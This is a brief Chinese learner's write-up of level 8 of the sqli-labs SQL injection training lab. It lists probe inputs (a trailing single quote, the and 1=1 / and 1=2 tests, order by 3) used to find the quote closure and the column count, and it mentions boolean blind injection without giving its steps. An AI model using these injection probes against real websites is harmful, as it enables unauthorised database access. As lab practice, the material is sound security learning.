sqli-labs less-8
* 判断注入
?id=1 回显正常
?id=1' 回显异常
说明闭合方式中含有单引号
接下来用and判断是否为单引号闭合
?id=1' and 1=1 --+ 回显正常
?id=1' and 1=2 --+ 回显异常
由此可知,本关为单引号闭合方式
* 判断列数
?id=1' order by 3 --+ 回显正常
可知,列数为3
* 查询详细信息
本关依然采用布尔盲注的方式进行信息的查询,详细步骤与第5关类似
盲注的方法有很多种,现在我还只会一种😝
剩下的方法还有待我去学习😅